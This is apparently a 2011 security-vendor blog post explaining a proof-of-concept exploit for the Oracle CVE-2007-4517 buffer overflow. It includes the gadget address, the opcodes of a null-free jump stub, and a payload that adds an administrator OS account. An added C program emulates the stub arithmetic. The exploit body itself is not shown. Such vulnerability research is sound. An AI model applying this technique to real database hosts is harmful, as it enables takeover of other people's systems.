New exploit for the Oracle CVE-2007-4517 vulnerability

November 2, 2011

Summary

As part of GreenSQL's database security research, we have been validating and extending coverage of known and unknown vulnerabilities in order to improve the protection the GreenSQL product provides. In this post we reveal a full working proof of concept for the CVE-2007-4517 vulnerability that executes arbitrary code on the database host.

The Exploit: PL/SQL/2007-4517 is a PL/SQL procedure that triggers the CVE-2007-4517 vulnerability, also known as the Oracle Database XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Multiple Argument Remote Overflow.

The vulnerability is caused by a boundary error in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure when it processes the OWNER and NAME arguments to build an SQL statement.

It can be exploited to cause a buffer overflow by passing overly long OWNER and NAME arguments to the affected procedure.

When the overflow is triggered, EBX holds the starting address of the attacker-controlled buffer plus 0x7A5.

In order to execute the payload in the buffer, two steps need to be performed:
1. EIP must point to an address that contains a jmp ebx instruction.
2. At the address EBX points to, the exploit needs to jump back 0x7A5 bytes to the start of the buffer.

Jumping to EBX
In order to jump to the address held in EBX, EIP is set to 0x095F7160, the address of a jmp ebx instruction in the target process. As with any hard-coded gadget address, this value is specific to the Oracle build and platform the exploit was developed against.

Jumping to the Payload
In order to reach the payload, the stub at [EBX] needs to perform the following instructions:
sub ebx, 0x7a5
jmp ebx

The opcodes of the first instruction are:
0x81, 0xEB, 0xA5, 0x07, 0x00, 0x00.
One limitation of the HEXTORAW() function used to deliver the payload is that it cannot handle 0x00 characters, and this encoding contains two of them.
For that reason, instead of sub ebx, 0x7a5 the stub uses the following null-free instructions:
sub bl,0xb0
add bh,0xfa
jmp ebx

Which are equivalent to:
sub ebx, 0x5b0
jmp ebx

That is, a jump to ebx-0x5b0. The equivalence works because sub bl, 0xb0 and add bh, 0xfa each operate on a single byte of EBX: the borrow out of the low byte is discarded, so the low byte wraps (a net change of +0x50 when bl is below 0xB0), and add bh, 0xfa subtracts 6 from the second byte (-0x600), for a total of -0x5B0. Two conditions must hold for this to be exact: the low byte of EBX must be below 0xB0 so that the byte subtraction wraps, and the low 16 bits of EBX must be at least 0x5B0 so that a true subtraction would not borrow into the upper half, which the byte-wise form never touches. Note also that the stub lands at buffer + 0x7A5 - 0x5B0 = buffer + 0x1F5, not at the start of the buffer, so the payload layout has to make the bytes at that offset executable (for example, the tail of a NOP sled).

The opcodes of these instructions are:
0x80, 0xEB, 0xB0, 0x80, 0xC7, 0xFA, 0xFF, 0xE3, none of which is 0x00, so the HEXTORAW() function is able to process them.
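As an added example (not part of the original post or of the GreenSQL exploit), the following C program models the two steps described above. It emulates the byte-wise arithmetic of the null-free stub on a 32-bit EBX, brute-forces the exact conditions under which it equals sub ebx, 0x5b0, computes where execution lands relative to the buffer, and renders the stub bytes as the uppercase hex literal HEXTORAW() accepts, rejecting any 0x00 byte. The buffer address 0x0BADC000 is a constructed value; the page gives only the +0x7A5 offset and the gadget address 0x095F7160.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The page states that EBX = buffer + 0x7A5 when the jmp ebx gadget runs. */
#define EBX_OFFSET 0x7A5u

/* "sub ebx, 0x7a5 ; jmp ebx": exact, but 81 EB A5 07 00 00 carries two nulls. */
static const uint8_t stub_with_nulls[] = {0x81, 0xEB, 0xA5, 0x07, 0x00, 0x00, 0xFF, 0xE3};

/* "sub bl,0xb0 ; add bh,0xfa ; jmp ebx": the null-free stub from the post. */
static const uint8_t stub_null_free[] = {0x80, 0xEB, 0xB0, 0x80, 0xC7, 0xFA, 0xFF, 0xE3};

/* Full 32-bit subtraction: borrows propagate through the whole register. */
uint32_t emulate_sub_ebx(uint32_t ebx, uint32_t imm) {
    return ebx - imm;
}

/* sub bl,imm8 and add bh,imm8 each update one byte of EBX; the carry or
 * borrow is discarded at the byte boundary and never reaches the other bytes. */
uint32_t emulate_bytewise_stub(uint32_t ebx) {
    uint8_t bl = (uint8_t)(ebx & 0xFFu);
    uint8_t bh = (uint8_t)((ebx >> 8) & 0xFFu);
    bl = (uint8_t)(bl - 0xB0u);   /* wraps when bl < 0xB0 */
    bh = (uint8_t)(bh + 0xFAu);   /* 0xFA == -6 mod 256 */
    return (ebx & 0xFFFF0000u) | ((uint32_t)bh << 8) | bl;
}

/* Predicted condition for the byte-wise stub to equal sub ebx, 0x5b0:
 * the low byte must wrap (bl < 0xB0) and the low 16 bits must not borrow
 * into the upper half ((ebx & 0xFFFF) >= 0x5B0). */
int bytewise_stub_is_exact(uint32_t ebx) {
    return (ebx & 0xFFu) < 0xB0u && (ebx & 0xFFFFu) >= 0x5B0u;
}

/* Brute-force the predicate over every 16-bit low half for one upper half;
 * returns the number of values where prediction and emulation disagree. */
unsigned verify_predicate(uint32_t upper16) {
    unsigned mismatches = 0;
    for (uint32_t lo = 0; lo <= 0xFFFFu; lo++) {
        uint32_t ebx = (upper16 << 16) | lo;
        int exact = emulate_bytewise_stub(ebx) == emulate_sub_ebx(ebx, 0x5B0u);
        if (exact != bytewise_stub_is_exact(ebx)) mismatches++;
    }
    return mismatches;
}

/* Offset from the buffer start at which execution resumes after the stub. */
int32_t landing_offset(uint32_t buffer) {
    uint32_t ebx = buffer + EBX_OFFSET;
    return (int32_t)(emulate_bytewise_stub(ebx) - buffer);
}

/* Index of the first 0x00 byte in the stub, or -1 if there is none. */
int first_null_byte(const uint8_t *code, size_t n) {
    for (size_t i = 0; i < n; i++) {
        if (code[i] == 0x00) return (int)i;
    }
    return -1;
}

/* Render bytes as the uppercase hex literal HEXTORAW() takes. Returns 0 on
 * success, -1 if a null byte is present or the output buffer is too small. */
int to_hex_literal(const uint8_t *code, size_t n, char *out, size_t outsz) {
    static const char digits[] = "0123456789ABCDEF";
    if (first_null_byte(code, n) >= 0 || outsz < 2 * n + 1) return -1;
    for (size_t i = 0; i < n; i++) {
        out[2 * i]     = digits[code[i] >> 4];
        out[2 * i + 1] = digits[code[i] & 0x0F];
    }
    out[2 * n] = '\0';
    return 0;
}

/* Convenience check: does the rendered literal equal the expected string? */
int literal_equals(const uint8_t *code, size_t n, const char *expected) {
    char lit[64];
    if (to_hex_literal(code, n, lit, sizeof lit) != 0) return 0;
    return strcmp(lit, expected) == 0;
}

int main(void) {
    uint32_t buffer = 0x0BADC000u;   /* constructed example address */
    char lit[32];
    printf("first null in full sub stub: index %d\n",
           first_null_byte(stub_with_nulls, sizeof stub_with_nulls));
    if (to_hex_literal(stub_null_free, sizeof stub_null_free, lit, sizeof lit) == 0)
        printf("HEXTORAW('%s')\n", lit);
    printf("stub lands at buffer+0x%X\n", (unsigned)landing_offset(buffer));
    printf("stub lands at buffer+0x%X for a misaligned buffer\n",
           (unsigned)landing_offset(buffer + 0x10u));
    printf("predicate mismatches over 65536 values: %u\n", verify_predicate(0x0BADu));
    return 0;
}
```

Running it shows the trick's dependence on the buffer address: with the buffer at 0x0BADC000 the low byte of EBX is 0xA5 and the stub lands at buffer+0x1F5 as the arithmetic predicts, but moving the buffer to 0x0BADC010 puts 0xB5 in BL, the byte subtraction no longer wraps, and execution lands 0x100 bytes short at buffer+0xF5. The predicate check reports zero mismatches, confirming the two conditions stated above are exact.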

The payload creates a new operating system user account named "GreenSQL" with the password "GreenSQL" on the database host.
After creating the account, it adds the user to the local "Administrators" group.

The exploit code is available below.

Conclusions

It is extremely important to keep your database updated with the latest patches and security updates released by the database vendor. This proof of concept shows how an older vulnerability, with some additional research, can be turned into a new working exploit that gains control of the database host operating system.

Database security solutions such as GreenSQL provide an additional layer of defense against known and unknown attacks.